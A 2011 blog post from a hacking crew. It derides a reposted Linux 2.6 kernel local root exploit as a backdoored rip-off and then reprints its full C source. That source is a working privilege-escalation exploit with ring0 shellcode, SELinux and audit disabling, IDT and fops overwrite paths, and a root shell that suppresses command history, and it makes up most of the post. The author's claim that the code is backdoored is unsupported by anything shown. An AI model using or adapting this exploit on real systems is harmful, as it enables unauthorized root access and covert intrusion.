CrazyCoders Coding team » 2011

LINUX 2.6.* Local x86_64 (ONLY) Backdoored AB rip-off code

Posted on 30th September 2011 in Exploits

We face a new low.. from 133day.com , this comes as a ‘new’ 2011 kernel exploit, i looked thru it, it is STILL backdoored like original ABftw.c code, wich will always bind a port, to usually 9999 i believe but, correct me if im wrong, this is a no brainer to see that it is simple…shellcode-hides-stuffs !
AB wont stand for this rubbuish, and theyre backdoor, is NON prtable
SO, this is being brought in front, and exposed, for the pathetic ripoff of ac1db1tch3z ,who unlike these jerkwads, actually KNOW theyre stuff.
this code, is not even trying to use a new vector :s it still handles syscalls via int 0×80 ,so, how will this beat a 2010 kernel ?
Anyhow, there is better exploit now for this, and much smaller, with no backdoors, and no mmap() needed. YES it is on this website, if your regged it will appear, unregged do NOT SEE all posts.
i would say, best todo is simply add us to a RSS feed, if anyone wants me to put up info + .tcl file on using eggdrop-with-rss for theyre own mIRC channels etc, just send me some ask in the form of a reply or comment even just pm..and ill be happy to make it, until there is a need then, what is the point.many people do not use tcl, or, dont use eggdrops on theyre linux box, they consider it security risk, but, i guess i use my one, from a registered shell account 9thx guys @ xzibition/Bryan.D in particular for his timeless adminship)
Again, thanks to all my #Haxnet @ EFNet friends ;>
it is now forsure, the best +ps channel ever made i think
Anyhow, feel free to show me, what this can do, this new exploit posted only TODAY mind you on 1337day.com, why is this, going to beat a -stab- kernel,and, i hope this aint some grab at a new method of enforcing linux and dummying it, coz, that is old to… I will post a grsec+selinux+chroot breakout, code wich works tho, wich does not need one bit of shellcode..nor shuld this smashing of stack on this, wont work on most boxes simply coz mmap() permission denied is still going to block it… you cannot make codes like this, thats just BS, NOTHING was even noted, and, this is still MCAST_FILTER attack… so, what is diffeent, again i ask… and, oh, btw, if u want to backdoor yourself, sure, go ahead, the cr3d shellcode is really a backdoor, or was it the idt….
have fun.
The real deal, is NOT this crap.. believe in me this.
cheers loyal readers
xd

PS: IT-Undergound is alive and well =) i am glad and hope they can get some site up soon with codes, i posted one of theyre sshd bruter for win32 actually, wich is from roy-def8 ,and he is a top guy!
Greets to anyone i missed, but, pls, try to explain to me what this thing, is gong todo, like, why not try find another vector atleast, rather than 0×80, then we would atleast have a new attack…and those targets, just suck… they can be taken out with a bash script
So, please, stop posting rubbish like this, and , concentrate on things like, the recent FreeBSD-REL-STAB bugs in compress and in ipc.. that one, is specially nice, coz it is socket based, and alot like sendmessage.. very easy to code, but ill leave that for someone like kcope, so he can broaden his arsenal ;p hehe, like it isnt big enough!
peace to my ‘homies’ ? OK!

The alleged bad code, and posted as ’0day on 133day.com ROFL!!!!

/*
kernel-2.6.30 2010 Local Root Exploit
====================================================
Author : Th3 L0rd Dilaw [GarA]
Home : Mafia Hack Team & www.Arhack.net
Exploit DataBase: 1337day.com
Gr33tz : Dr.Sayros & Last breath & Dr.BiLLi &
Dr.Milas & O-Snip3r & El Boss Gangster
This Local work also on :
2.6.30 .10 /*/ 2.6.30 .1 /*/ 2.6.30 -rc6 /*/ 2.6.30 -rc5 /*/ 2.6.30 -rc3 /*/ 2.6.30 -rc2 /*/ 2.6.30 -rc1 /*/
====================================================
*/
#include <poll.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <sched.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <errno.h>
#ifndef __i386__
#error "x86_64 is the targets here.."
#else
#define _GNU_SOURCE
#define __dgdhdytrg55 unsigned int
#define __yyrhdgdtfs66ytgetrfd unsigned long long
#define __dhdyetgdfstreg__ memcpy

#define BANNER "Ac1dB1tCh3z VS Linux kernel 2.6 kernel\n"

#define KALLSYMS              "/proc/kallsyms"
#define TMAGIC_66TDFDRTS      "/proc/timer_list"
#define SELINUX_PATH          "/selinux/enforce"
#define RW_FOPS               "timer_list_fops"
#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"
#define PREPARE_GGDTSGFSRFSD  "prepare_creds"
#define OVERRIDE_GGDTSGFSRFSD "override_creds"
#define REVERT_DHDGTRRTEFDTD  "revert_creds"
#define Y0Y0SMAP 0x100000UL
#define Y0Y0CMAP 0x200000UL
#define Y0Y0STOP (Y0Y0SMAP+0xFFC)
#define J0J0S 0x00200000UL
#define J0J0R00T 0x002000F0UL
#define PAGE_SIZE 0x1000
#define KERN_DHHDYTMLADSFPYT 0x1
#define KERN_DGGDYDTEGGETFDRLAK 0x2
#define KERN_HHSYPPLORQTWGFD 0x4
#define KERN_DIS_GGDYYTDFFACVFD_IDT 0x8
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS 0x10
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20
#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX 0x40
#define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5"))
#define TRY_REMAP_DEFAULT 1

#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0)
#define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0)
#define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0)
#define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0)

static char buffer[1024];
static int s;
static int flags=0;
volatile static socklen_t magiclen=0;
static int useidt=0, usefops=0, uselsm=0;
static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0};
static __dgdhdytrg55 _m_cpu_off=0;
static char krelease[64];
static char kversion[128];

#define R0C_0FF 14

static char ttrg0ccc[]=
"\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41"
"\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c"
"\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11"
"\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02"
"\xeb\xcc\x5e\x5b\x5f\x59\xc3";
#define R0YTTTTUHLFSTT_OFF1 5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21
#define R0TDGFSRSLLSJ_SHSYSTGD 45

char r1ngrrrrrrr[]=
"\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3"
"\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42"
"\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7"
"\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"
"\xff\xd3\x5f\x5f\x5a\x5b\xc3";

#define RJMPDDTGR_OFF 13
#define RJMPDDTGR_DHDYTGSCAVSF 7
#define RJMPDDTGR_GDTDGTSFRDFT 25

static char ttrfd0[]=
"\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x58\x5f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xc3";

/* implement selinux bypass for IDT */
#define RJMPDDTGR_OFF_IDT 14
#define RJMPDDTGR_DYHHTSFDARE 8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27

static char ruujhdbgatrfe345[]=
"\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x0f\x01\xf8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x48\xcf";

#define CJE_4554TFFDTRMAJHD_OFF 10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23

static char dis4blens4sel1nuxhayettgdr64545[]=
"\x41\x52\x50"
"\xb8\x00\x00\x00\x00"
"\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x89\x02"
"\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"
"\x41\x89\x02"
"\x58\x41\x5a";

/* rhel LSM stuffs */
#define RHEL_LSM_OFF 98

struct LSM_rhel {
  __yyrhdgdtfs66ytgetrfd selinux_ops;
  __yyrhdgdtfs66ytgetrfd capability_ops;
  __yyrhdgdtfs66ytgetrfd dummy_security_ops;
  __yyrhdgdtfs66ytgetrfd selinux_enforcing;
  __yyrhdgdtfs66ytgetrfd audit_enabled;
  const char *krelease;
  const char *kversion;
};

struct LSM_rhel known_targets[4]= {
  {
    0xffffffff8031e600ULL,
    0xffffffff8031fec0ULL,
    0xffffffff804acc00ULL,
    0xffffffff804af960ULL,
    0xffffffff8049b124ULL,

    "2.6.18-164.el5",
    "#1 SMP Thu Sep 3 03:28:30 EDT 2009"  // to manage minor/bug fix changes
  },
  {
   0xffffffff8031f600ULL,
   0xffffffff80320ec0ULL,
   0xffffffff804afc00ULL,
   0xffffffff804b2960ULL,
   0xffffffff8049e124ULL,

   "2.6.18-164.11.1.el5",
   "#1 SMP Wed Jan 6 13:26:04 EST 2010"
  },
  {
    0xffffffff805296a0ULL,
    0xffffffff8052af60ULL,
    0xffffffff806db1e0ULL,
    0xffffffff806ddf40ULL,
    0xffffffff806d5324ULL,
    "2.6.18-164.11.1.el5xen",
    "#1 SMP Wed Jan 20 08:06:04 EST 2010"   // default xen
  },
  {
    0xffffffff8031f600ULL,// d selinux_ops
    0xffffffff80320ec0ULL,// d capability_ops
    0xffffffff804afc00ULL,// B dummy_security_ops
    0xffffffff804b2960ULL,// B selinux_enforcing
    0xffffffff8049e124ULL,// B audit_enabled
    "2.6.18-164.11.1.el5",
    "#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL
   }
};

static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;
struct socketcallAT {
  int s;
  int level;
  int optname;
  void *optval;
  volatile socklen_t *optlen;
} __attribute__((packed));

struct idt64from32_s {
  unsigned short limit;
  unsigned long base;
} __attribute__((packed));

static __yyrhdgdtfs66ytgetrfd getidt() {
  struct idt64from32_s idt;
  memset(&idt, 0x00, sizeof(struct idt64from32_s));
  asm volatile("sidt %0" : "=m"(idt));
  return idt.base | 0xFFFFFFFF00000000ULL;
}

static int isSelinuxEnabled() {
  FILE *selinux_f;
  selinux_f = fopen(SELINUX_PATH, "r");
  if(selinux_f == NULL) {
    if(errno == EPERM)
      return 1;
    else
     return 0;
  }
  fclose(selinux_f);
  return 1;
}

static int wtfyourunhere_heee(char *out_release, char* out_version) {
 int ret; const char*ptr;
 int count=0;
 char r[32], *bptr;
 struct utsname buf;
 ret =  uname(&buf);
 if(ret < 0)
   return -1;
 strcpy(out_release, buf.release);
 strcpy(out_version, buf.version);
 ptr = buf.release;
 bptr = r;
 memset(r, 0x00, sizeof(r));
 while(*ptr)
 {
   if(count == 2)
    {
      if(*ptr >= '0' && *ptr <= '9')
        *bptr++ = *ptr;
      else
        break;
    }
   if(*ptr == '.')
     count++;
   ptr++;
 }
 if(strlen(r) < 1 || !atoi(r))
   return -1;
 return atoi(r);
}

static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)
{
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing;
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled;
__dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, 

sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
__dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, 

sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
}

static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag) {
  FILE *ka;
  char line[512];
  char reloc_a[64];
  char reloc[64];
  if(!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag)
    return 0;
  ka = fopen(filename, "r");
  if(!ka)
    return 0;
  while(fgets(line, 512, ka) != NULL) {
    char *l_p  = line;
    char *ra_p = reloc_a;
    char *r_p    = reloc;
    memset(reloc, 0x00, sizeof(reloc));
    memset(reloc_a, 0x00, sizeof(reloc_a));
    while(*l_p != ' ' && (ra_p - reloc_a)  < 64)
      *ra_p++ = *l_p++;
    l_p += 3;
    while(*l_p != ' ' && *l_p != '\n' && *l_p != '\t' && (r_p - reloc) < 64)
      *r_p++ = *l_p++;
    if(!strcmp(reloc, s)) {
      __gggdfstsgdt_dddex("OK! %s->%s\n", s, reloc_a);
      return strtoull(reloc_a, NULL, 16);
    }
  }
  return 0;
}

static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s) {
  return get_sym_ex(s, KALLSYMS, 0);
}

static int parse_cred(const char* val) {
  int i=0;
  const char* p = val;
  char local[64], *l;
  for(i=0; i<3; i++)  {
    memset(local, 0x00, sizeof(local));
    l = local;
    while(*p && *p != ',')
      *l++ = *p++;
    if(!(*p) && i != 2)
      return -1;
    _m_cred[i] = strtoull(local, NULL, 16);
    p++;
  }
  return 0;
}

#define SELINUX_OPS        "selinux_ops"
#define DUMMY_SECURITY_OPS "dummy_security_ops"
#define CAPABILITY_OPS     "capability_ops"
#define SELINUX_ENFORCING  "selinux_enforcing"
#define AUDIT_ENABLED      "audit_enabled"

struct LSM_rhel *lsm_rhel_find_target(int check_rhel) {
   int i;
   char mapbuf[128];
   struct LSM_rhel *lsm = &(known_targets[0]);
   if(check_rhel && !isRHHGDPPLADSF(krelease)) {
     __pppp_tegddewyfg("N0t a RHEL k3rn3l! \n");
     return NULL;
   }
   __pppp_tegddewyfg("L00k1ng f0r kn0wn t4rg3tz\n");
   for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++) {
     if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion)) {
       __gggdfstsgdt_dddex("Th1z 1z good as rooted. kn0wn t4rg3t: %s %s \n", lsm->krelease, lsm->kversion);
       return lsm;
     }
   }
   __pppp_tegddewyfg("c0mput3r 1z aqu1r1ng n3w t4rg3t\n");
   strcpy(mapbuf, "/boot/System.map-");
   strcat(mapbuf, krelease);

   dyn4nt4n1labeggeyrthryt.selinux_ops        = get_sym_ex(SELINUX_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.capability_ops     = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.selinux_enforcing  = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.audit_enabled      = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);

   if(!dyn4nt4n1labeggeyrthryt.selinux_ops || !dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
      !dyn4nt4n1labeggeyrthryt.capability_ops || !dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
      !dyn4nt4n1labeggeyrthryt.audit_enabled)
    return NULL;
   return &dyn4nt4n1labeggeyrthryt;
}

static void put_your_hands_up_hooker(int argc, char *argv[]) {
  int fd,ver,ret;
  char __b[16];
  fd = open(KALLSYMS, O_RDONLY);
  ret = read(fd, __b, 16); // dummy read
  if((fd >= 0 && ret > 0)) {
    __pppp_tegddewyfg("Kallsyms +r\t\n");
    flags |= KERN_HHSYPPLORQTWGFD;
  }
  close(fd);
  ver = wtfyourunhere_heee(krelease, kversion);
  if(ver < 0)
    __yyy_tegdtfsrer("Un4bl3 t0 g3t r3l3as3!\n");
  __gggdfstsgdt_dddex("K3rn3l r3l3as3: %s\n", krelease);
  if(argc != 1) {
    while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0) {
      switch(ret) {
        case 'i':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
          useidt=1; // u have to use -i to force IDT Vector
          break;
        case 'f':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT;
          break;
	case 'l':
	  flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
	  break;
        case 'c':
          if(!optarg || parse_cred(optarg) < 0)
              __yyy_tegdtfsrer("Un4bl3 t0 p4s3 cr3d c0d3z\n");
          break;
        case 'k':
          if(optarg)
            _m_fops = strtoull(optarg, NULL, 16);
          else
	     __yyy_tegdtfsrer("Un4bl3 t0 p4rs3 f0P numb3rs\n");
          break;
        case 's':
          if(!isSelinuxEnabled())
            __pppp_tegddewyfg("s3l1nux 1z n0t 3n4bl3d!\n");
          else
            flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
          break;
        case 'o':
          if(optarg)
            _m_cpu_off = strtoull(optarg, NULL, 16);
	  else
	    __yyy_tegdtfsrer("Un4bl3 t0 p4rs3 f0p c0mput3r numb3rs\n");
          break;
      }
    }
  }
  if(ver >= 29) // needs cred structure
  {
    flags |= KERN_DGGDYDTEGGETFDRLAK;
    if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) {
      _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);
      _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD);
      _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);
    }
    if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) {
      __yyy_tegdtfsrer("Err0r 1n s3tt1ng cr3d sh3llc0d3z\n");
    }
    __pppp_tegddewyfg("Kernel Credentials detected\n");
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2];
  }
  if(ver >= 30)  // needs cpu offset
  {
    flags |= KERN_DHHDYTMLADSFPYT;
    if(!_m_cpu_off)
    _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);
    if(!_m_cpu_off)
      __yyy_tegdtfsrer("Err0r s3tt1ng up cr3d sh3llc0d3z\n");
    __pppp_tegddewyfg("K3rn3l per_cpu r3l0cs 3n4bl3d!\t\n");
    *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off;
    *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;
  }
}

static void env_prepare(int argc, char* argv[]) {
  put_your_hands_up_hooker(argc, argv);
  if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS))  {// try fops
    __pppp_tegddewyfg("Trying the F0P m3th34d\n");
    if(!_m_fops)
      _m_fops = get_sym(RW_FOPS);
    if(_m_fops) {
      usefops=1;
      __pppp_tegddewyfg("chose attack vector F0Ps\n");
    }
  }
  if(!usefops && !(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) {// try lsm(rhel)
    curr_target = lsm_rhel_find_target(1);
    if(!curr_target) {
       __pppp_tegddewyfg("u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!\n");
    }
    else
      uselsm=1;
  }
  if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) {
    // -i flag
    curr_target = lsm_rhel_find_target(0);
    if(!curr_target)
    {
       __pppp_tegddewyfg("Un4lb3 t0 f1nd t4rg3t: c0ntinu3ing w1th0ut s3linsux d1s4bl3d.\n");
       flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
    }
  }
  if(!usefops && !useidt && !uselsm)
  __yyy_tegdtfsrer("3v3ryth3ng f41l3d!! try an0th3r sploit\n");
}

static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack) {
  int socklen_l = 8 + stack - addr - 16;
  return socklen_l;
}

static struct socketcallAT at;
static __dgdhdytrg55 idtover[4] =
             {0x00100000UL,
              0x0020ee00UL,
              0x00000000UL,
              0x00000000UL};

static void fillsocketcallAT() {
 at.s = s;
 at.level = SOL_IP;
 at.optname = MCAST_MSFILTER;
 at.optval = buffer;
 at.optlen = &magiclen;
}

static void bitch_call(struct socketcallAT *at, void *stack) {
  asm volatile(
      "push %%ebx\t\n"
      "push %%esi\t\n"
      "push %%ecx\t\n"
      "push %%edx\t\n"
      "movl $0x66, %%eax\t\n"
      "movl $0xf, %%ebx\t\n"
      "movl %%esp, %%esi\t\n"
      "movl %0, %%ecx\t\n"
      "movl %1, %%esp\t\n"
      "int $0x80\t\n"
      "movl %%esi, %%esp\t\n"
      "pop %%edx\t\n"
      "pop %%ecx\t\n"
      "pop %%esi\t\n"
      "pop %%ebx\t\n"
      :  : "r"(at), "r"(stack)  : "memory", "eax", "ecx", "ebx", "esi"
     );
}

static void __setmcbuffer(__dgdhdytrg55 value) {
  int i;
  __dgdhdytrg55 *p = (__dgdhdytrg55*)buffer;
  for(i=0; i<sizeof(buffer)/sizeof(void*); i++)
    *(p+i) = value;
}

static void idt_smash(__yyrhdgdtfs66ytgetrfd idtbase) {
  int i;
  __dgdhdytrg55 curr;
  for(i=0; i<sizeof(idtover)/sizeof(idtover[0]);i++) {
    curr = idtover[i];
    __setmcbuffer(curr);
    magiclen =  get_socklen(idtbase + (i*4), Y0Y0STOP);
    bitch_call(&at, (void*)Y0Y0STOP);
  }
}

static void y0y0stack() {
  void* map = mmap((void*)Y0Y0SMAP,PAGE_SIZE,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,-1,0);
  if(MAP_FAILED == map)
    __xxxfdgftr_hshsgdt("mmap");
}

static void y0y0code() {
void* map = mmap((void*)Y0Y0CMAP,PAGE_SIZE,
#ifdef TRY_REMAP_DEFAULT
PROT_READ|PROT_WRITE,
#else
PROT_READ|PROT_WRITE|PROT_EXEC,
#endif
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,-1,0);
if(MAP_FAILED == map)
__xxxfdgftr_hshsgdt("mmap");
}

static int rey0y0code(unsigned long old) {
  int fd;
  void *map;
  volatile char wizard;
  char cwd[1024];
  getcwd(cwd, sizeof(cwd));
  strcat(cwd, "/__tmpfile");
  unlink(cwd);
  fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);
  if(fd < 0)
    return -1;
  write(fd, (const void*)old, PAGE_SIZE);
  if(munmap((void*)old, PAGE_SIZE) < 0)
    return -1;
  map = mmap((void*)old,PAGE_SIZE,PROT_READ|PROT_EXEC,MAP_PRIVATE|MAP_FIXED,fd,0);
  if(map == MAP_FAILED)
  return -1;
  wizard = *((char*)old);
  unlink(cwd);
  return wizard;
}

int main(int argc, char*argv[]) {
  int uid,fd;
  __yyrhdgdtfs66ytgetrfd *patch, idtb;
  struct pollfd pfd;
  printf(BANNER);
  uid = getuid();
  env_prepare(argc, argv);
  y0y0stack();
  y0y0code();
  if(useidt) {
    idtb = getidt();
    __gggdfstsgdt_dddex("b4s3 addr3ss: %llx\n", idtb);
    __pppp_tegddewyfg("Bu1ld1ng r1ng0 sh3llc0de - IDT\n");
    patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
    __pppp_tegddewyfg("Prepare: m0rn1ng w0rk0ut\n");
    if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX) {
      __pppp_tegddewyfg("add1ng sp3c14l c0de t0 rem0v3 s3linux\n");
      p4tch_sel1nux_codztegfaddczda(curr_target);
    }
    __dhdyetgdfstreg__((void*)J0J0S,  ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));
  } else if(usefops || uselsm) {
    __pppp_tegddewyfg("Bu1ld1ng r1ng0 sh3llc0d3 - F0PZzzZzZZ/LSD(M)\n");
    patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
    __setmcbuffer(J0J0S);
    __pppp_tegddewyfg("Prepare: m0rn1ng w0rk0ut\n");
    if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) {
    __pppp_tegddewyfg("add1ng sp3c14l c0de t0 rem0v3 s3linux\n");
    p4tch_sel1nux_codztegfaddczda(curr_target);
    }
    __dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0));
  }
  if(flags & KERN_DGGDYDTEGGETFDRLAK) {
    __pppp_tegddewyfg("Us1ng cr3d s3ash3llc0d3z\n");
    __dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));
  } else {
    __pppp_tegddewyfg("Us1ng st4nd4rd s3ash3llz\n");
    __dhdyetgdfstreg__((void*)J0J0R00T,  ttrg0ccc, sizeof(ttrg0ccc));
    *((unsigned int*)(J0J0R00T + R0C_0FF)) = uid;
  }
  __pppp_tegddewyfg("0p3n1ng th3 m4giq p0rt\n");
  s = socket(AF_INET, SOCK_DGRAM, 0);
  if(s < 0)
  __xxxfdgftr_hshsgdt("socket");
  fillsocketcallAT();
#ifdef TRY_REMAP_DEFAULT
  if(rey0y0code(Y0Y0CMAP) < 0)
    __yyy_tegdtfsrer("Un4bl3 t0 r3m4p sh1t\t\n");
#endif
  if(useidt) {
    __yyrhdgdtfs66ytgetrfd idtentry = idtb + (2*sizeof(__yyrhdgdtfs66ytgetrfd)*0xdd);
    __gggdfstsgdt_dddex("Us1ng 1dt 3ntry: %d\n", 0xdd);
    idt_smash((idtentry));
    sleep(1);
    asm volatile("int $0xdd\t\n");
  } else if(usefops) {
    magiclen = get_socklen(_m_fops, Y0Y0STOP);
    magiclen -= 7*sizeof(__yyrhdgdtfs66ytgetrfd);
    __gggdfstsgdt_dddex("m4q1c p0rt4l l3n f0und: 0x%x\n", magiclen);
    __pppp_tegddewyfg("Killin f0ps\n");
    bitch_call(&at, (void*)Y0Y0STOP);
    sleep(1);
    fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
    if(fd < 0)
    __xxxfdgftr_hshsgdt("fuq t1m3r_l1st");
    pfd.fd = fd;
    pfd.events = POLLIN | POLLOUT;
    poll(&pfd, 1, 0);
  } else if(uselsm) {
    int msqid;
    __yyrhdgdtfs66ytgetrfd selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF);
    __yyrhdgdtfs66ytgetrfd dummy_msg_off   = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF);
    __yyrhdgdtfs66ytgetrfd capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF);
    msqid = msgget(0, IPC_PRIVATE|0600);
    if(msqid < 0)
      __xxxfdgftr_hshsgdt("fuq!");
    magiclen =  get_socklen(selinux_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(dummy_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(dummy_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(capability_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(capability_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);
    msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it here
  }
  munmap((void*)Y0Y0CMAP, PAGE_SIZE);
  if(getuid() == 0) {
    pid_t pid;
    __pppp_tegddewyfg("[!] got root\n");
    pid = fork();
    if(pid == 0)
    {
      char *args[] = {"/bin/sh", "-i", NULL};
      char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", 

"HISTFILESIZE=0","PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
      execve("/bin/sh", args, envp);
    } else {
      int status;
      waitpid(pid, &status, 0);
    }
  }
  else
    __pppp_tegddewyfg("[-] exploit failed!\n");
  close(s);
  return 0;
}

….thankgod the nightmare is over…

